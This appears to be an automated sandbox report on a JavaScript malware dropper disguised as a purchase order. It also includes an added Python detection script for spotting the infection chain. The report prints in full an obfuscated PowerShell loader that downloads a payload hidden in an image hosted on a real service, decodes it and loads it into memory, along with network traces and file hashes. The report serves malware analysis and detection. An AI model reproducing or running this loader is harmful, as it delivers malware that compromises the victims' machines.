Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-12-2024 00:12

General

  • Target

    PO24090026.js

  • Size

    75KB

  • MD5

    2e461076f6618e8f34ac4ada5bcc55fd

  • SHA1

    343a6c8b272ee7c261c9a3fb1eda91f769cc18ed

  • SHA256

    943869c0fd11cfbfdbf3ba902377e1470be12c94a9f2d49c952a14a9700552b0

  • SHA512

    c4d0fc5f78321824c32493491cf0e29bb50a24294eb08e6934d206e4adeaa1aa1f7ddc2f443fe5e4ba9bb8d534443af61e9bdb8578573c66ab2f2b754d599985

  • SSDEEP

    1536:8Z4xzQ6VsYE/D5OK1hoFPqd50a+X7psEBCCB29f+JrdWXOUPmMcA9KBwbBs:8SzQ6Vo/9RzY

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$parkinson = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$paunches = New-Object System.Net.WebClient;$hebiter = $paunches.DownloadData($parkinson);$tsarevichi = [System.Text.Encoding]::UTF8.GetString($hebiter);$shilpit = '<<BASE64_START>>';$riotise = '<<BASE64_END>>';$percylite = $tsarevichi.IndexOf($shilpit);$marbleization = $tsarevichi.IndexOf($riotise);$percylite -ge 0 -and $marbleization -gt $percylite;$percylite += $shilpit.Length;$Rybnik = $marbleization - $percylite;$overbill = $tsarevichi.Substring($percylite, $Rybnik);$unvaccinated = -join ($overbill.ToCharArray() | ForEach-Object { $_ })[-1..-($overbill.Length)];$autosave = [System.Convert]::FromBase64String($unvaccinated);$chemotropism = [System.Reflection.Assembly]::Load($autosave);$queef = [dnlib.IO.Home].GetMethod('VAI');$queef.Invoke($null, @('txt.tirb/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth', '$punkling', '$punkling', '$punkling', 'MSBuild', '$punkling', '$punkling','$punkling','$punkling','$punkling','$punkling','$punkling','1','$punkling','TaskName'));
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\PO24090026.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$parkinson = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$paunches = New-Object System.Net.WebClient;$hebiter = $paunches.DownloadData($parkinson);$tsarevichi = [System.Text.Encoding]::UTF8.GetString($hebiter);$shilpit = '<<BASE64_START>>';$riotise = '<<BASE64_END>>';$percylite = $tsarevichi.IndexOf($shilpit);$marbleization = $tsarevichi.IndexOf($riotise);$percylite -ge 0 -and $marbleization -gt $percylite;$percylite += $shilpit.Length;$Rybnik = $marbleization - $percylite;$overbill = $tsarevichi.Substring($percylite, $Rybnik);$unvaccinated = -join ($overbill.ToCharArray() | ForEach-Object { $_ })[-1..-($overbill.Length)];$autosave = [System.Convert]::FromBase64String($unvaccinated);$chemotropism = [System.Reflection.Assembly]::Load($autosave);$queef = [dnlib.IO.Home].GetMethod('VAI');$queef.Invoke($null, @('txt.tirb/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth', '$punkling', '$punkling', '$punkling', 'MSBuild', '$punkling', '$punkling','$punkling','$punkling','$punkling','$punkling','$punkling','1','$punkling','TaskName'));"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2940
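The process tree above (wscript.exe running PO24090026.js out of %TEMP%, then powershell.exe with the whole loader inline in -Command) is what an endpoint sensor sees before any network activity starts. The Python below is an added example for this page, not from the report or any vendor product: triage rules run over process-creation records. The records are constructed here in a Sysmon Event ID 1-like shape (Image, ParentImage, CommandLine, ParentCommandLine; the field names are an assumption about the collector), and the malicious one carries an abridged copy of the command line from the process tree, with `...` standing for the assignments left out.

```python
import re

# Command-line fragments visible in the report's powershell.exe invocation.
COMMAND_LINE_RULES = [
    ("webclient-download", r"System\.Net\.WebClient|\.DownloadData\(|\.DownloadString\("),
    ("base64-decode", r"FromBase64String\("),
    ("reflective-assembly-load", r"\[System\.Reflection\.Assembly\]::Load\("),
    ("array-slice-string-reversal", r"\[-1\.\.-\("),
    ("getmethod-invoke", r"\.GetMethod\(.*\.Invoke\("),
]

SCRIPT_HOST = re.compile(r"\\(wscript|cscript)\.exe$", re.I)
POWERSHELL = re.compile(r"\\powershell\.exe$", re.I)
TEMP_SCRIPT = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.(js|jse|vbs|vbe|wsf)\b", re.I)


def score_event(event: dict) -> list:
    """Return the names of the rules one process-creation record matches."""
    hits = []
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    cmd = event.get("CommandLine", "")
    parent_cmd = event.get("ParentCommandLine", "")

    # Parent/child pair from the process tree: wscript.exe -> powershell.exe
    if POWERSHELL.search(image) and SCRIPT_HOST.search(parent):
        hits.append("powershell-spawned-by-script-host")
    # Script host executing a script straight out of the user's Temp folder,
    # whether this record is the script host itself or its child.
    if (SCRIPT_HOST.search(image) and TEMP_SCRIPT.search(cmd)) or (
        SCRIPT_HOST.search(parent) and TEMP_SCRIPT.search(parent_cmd)
    ):
        hits.append("script-host-running-from-temp")
    # Content rules only make sense on a PowerShell command line.
    if POWERSHELL.search(image):
        for name, pattern in COMMAND_LINE_RULES:
            if re.search(pattern, cmd, re.I):
                hits.append(name)
    return hits


def triage(events: list, threshold: int = 3) -> list:
    """Return (index, hits) for every record that reaches the hit threshold."""
    flagged = []
    for index, event in enumerate(events):
        hits = score_event(event)
        if len(hits) >= threshold:
            flagged.append((index, hits))
    return flagged


# Abridged from the command line in the process tree; '...' marks omitted assignments.
LOADER_CMD = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "'
    r"$parkinson = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';"
    r"$paunches = New-Object System.Net.WebClient;$hebiter = $paunches.DownloadData($parkinson);...;"
    r"$unvaccinated = -join ($overbill.ToCharArray() | ForEach-Object { $_ })[-1..-($overbill.Length)];"
    r"$autosave = [System.Convert]::FromBase64String($unvaccinated);"
    r"$chemotropism = [System.Reflection.Assembly]::Load($autosave);"
    r"$queef = [dnlib.IO.Home].GetMethod('VAI');$queef.Invoke($null, @(...))"
    '"'
)

WSCRIPT_CMD = r"wscript.exe C:\Users\Admin\AppData\Local\Temp\PO24090026.js"

# Constructed records (Sysmon Event ID 1-like field names are an assumption).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\system32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": WSCRIPT_CMD, "ParentCommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\system32\wscript.exe",
     "CommandLine": LOADER_CMD, "ParentCommandLine": WSCRIPT_CMD},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -Command "Get-ChildItem C:\Temp"', "ParentCommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\system32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe \\fileserver\netlogon\map_drives.vbs", "ParentCommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(f"event {index}: {len(hits)} hits -> {', '.join(hits)}")
```

The threshold keeps a lone wscript.exe launch from %TEMP% (one hit) below the alert line while the powershell.exe child in this chain matches all seven rules; the content patterns are deliberately the generic parts of the command line (WebClient, FromBase64String, Assembly::Load, the `[-1..-(` slice, GetMethod/Invoke) rather than the randomised variable names, which change from sample to sample.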

Network

  • flag-us
    DNS
    res.cloudinary.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    res.cloudinary.com
    IN A
    Response
    res.cloudinary.com
    IN CNAME
    ion.cloudinary.com.edgekey.net
    ion.cloudinary.com.edgekey.net
    IN CNAME
    e1315.dsca.akamaiedge.net
    e1315.dsca.akamaiedge.net
    IN A
    184.26.132.41
  • flag-gb
    GET
    https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
    powershell.exe
    Remote address:
    184.26.132.41:443
    Request
    GET /dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: image/jpeg
    Content-Length: 2676697
    ETag: "e5745d252aadd8dc5931363c7261f0a8"
    Last-Modified: Mon, 16 Dec 2024 02:14:05 GMT
    Date: Thu, 19 Dec 2024 00:12:27 GMT
    Connection: keep-alive
    Cache-Control: public, no-transform, immutable, max-age=2592000
    x-request-id: 70d4331ee42414ff46f04161fd976324
    Access-Control-Expose-Headers: Content-Length,Content-Disposition,Content-Range,Etag,Server-Timing,Vary,X-Cld-Error,X-Robots-Tag,X-Content-Type-Options
    Access-Control-Allow-Origin: *
    Accept-Ranges: bytes
    Timing-Allow-Origin: *
    Server: Cloudinary
    Strict-Transport-Security: max-age=604800
    X-Content-Type-Options: nosniff
    Server-Timing: cld-akam;dur=4;start=2024-12-19T00:12:27.862Z;desc=hit,rtt;dur=60,content-info;desc="width=1920,height=1080,bytes=2676697,format=\"jpg\",o=1,crt=1734315244,ef=(17)"
  • 184.26.132.41:443
    https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
    tls, http
    powershell.exe
    105.6kB
    2.8MB
    1612
    1996

    HTTP Request

    GET https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg

    HTTP Response

    200
  • 8.8.8.8:53
    res.cloudinary.com
    dns
    powershell.exe
    64 B
    160 B
    1
    1

    DNS Request

    res.cloudinary.com

    DNS Response

    184.26.132.41

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabE83F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarE861.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/2940-4-0x0000000002FB0000-0x0000000003030000-memory.dmp

    Filesize

    512KB

  • memory/2940-5-0x000000001B830000-0x000000001BB12000-memory.dmp

    Filesize

    2.9MB

  • memory/2940-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/2940-41-0x0000000002FB0000-0x0000000003030000-memory.dmp

    Filesize

    512KB

  • memory/2940-43-0x000000001B030000-0x000000001B1DA000-memory.dmp

    Filesize

    1.7MB
